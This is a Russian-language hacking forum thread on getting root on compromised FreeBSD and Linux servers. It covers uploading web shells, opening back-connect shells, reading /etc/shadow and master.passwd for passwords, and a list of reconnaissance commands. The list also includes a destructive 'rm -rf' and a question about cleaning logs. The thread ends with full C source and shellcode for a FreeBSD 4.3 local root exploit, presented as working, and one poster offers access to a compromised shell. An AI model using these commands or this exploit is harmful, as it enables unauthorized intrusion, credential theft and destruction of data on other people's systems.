Короче как брать рута на Фряхе Линюксе... Опишите все по шажкам... Что в первую очередь надо посмотреть где могут быть пароли в часности интрересует ssh. БольшОЕ Спасибо Прозьба тем кто не знает не писать.!
так так=) отвечаю все подробно... сначала заливаешь шелл , потом пробиваешь к консоли (бек коннект, бинд) после того как пробился к консоли то есть ты уже в системе набираешь uname -a если линуха + кернел НЕ 2005 то можно попробывать взять паблик сплойтами которые лежат web-hack.ru/exploit , а перед всем этим не забываем проверять на наличие компилятора и качалок (which wget curl lynx fetch links get, which gcc cc) вот так.. а пассы от SSH бывают в /etc/shadow на всякий случай можешь попробвать как зашел в систему cat /etc/shadow но это далеко не каждый раз случается=) так что качаешь сплойты с сайта компилишь запускаешь.. чего непонятно спрашивай не стесняйся!))
ухахаха )))))))))))))) Это в линуксе, в фряхе master.passwd насколько я помню)) Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно... Бывает часто плохо права выставленны...
Народ кто готов Дайю шалл ip:порт вы снимаете видео по поиску всего что описали... Исход не имееть значения.... как вам? кто готов в асю 30003111
=============== Вообщем вы мне нечего нового не сказали... Вот собственно мои знания... $pwd;id;ls -la $who $uname -a $which gcc $which wget $which lynx $which fetch $ps -ax $find / -type f -perm -04000 -ls // поиск файлов с sqid битом $find / -type f -name "config*" //поиск по маске всех файлов с именем config*(манипулиренм названиями. $find . -type f -name "config*" тоже самое токо ищем директории. $find / -type f -name .htpasswd // без коментариев. $find / -type f -name .bash_history // ищем историю bash оболочки. $netstat -an | grep -i listen // без коментариев. $find / -type d -perm 0777 //ищем папки с правами на запись. $sysctl -a | grep version // более точный способ определения OS $cat /proc/version // Версия ядра. $cat /etc/syslog.conf // смотрим syslog $cat /etc/hosts // смотрим виртуальные хосты. $locate httpd.conf // без коментариев. $cd /; rm -rf // Вот собственно все что хотел вам сказать... Меня еще интересует вопросы 1)Что делать с фалами которые имеют sqid биты? 2)Где еще могу быть пароли ваши линей взлома. 3)Еще команды блоки команд. 4)Да еще чистка логов... Вообщем меня интересует взлом системы без применения сплойтов.
хихихихи))) Ты что копировал из-какого нить шелла с алиасами? Нах тебе искать то что ты не понимаешь:?: sqid suid биты например. Вопще поставь себе линукс,мож выучиешь что-нибуть)))) sqid suid-права файла выполняться от прав рута они чем-то отличаются только хз чем
Да... Я по твоему не знал что sqid биты запушены от рута и имеют его привелегии. Я Спрашивал про использывание их для получения рута.! Насчет алиасов когда я используй веб шел мне свойственно запоминать команды если ты их сам придумываешь из головы из своей а не где не смотришь или узнаешь то извини... Лан погорячился...
Хех,ты забыл про один бронебойный сплойт. Кому надо...Сплойт рабочий,бага актуальна.... Code: /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include <stdio.h> #include <signal.h> #include <unistd.h> int vv1; #define MYSIG SIGINT //exec "/tmp/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"); while(42); }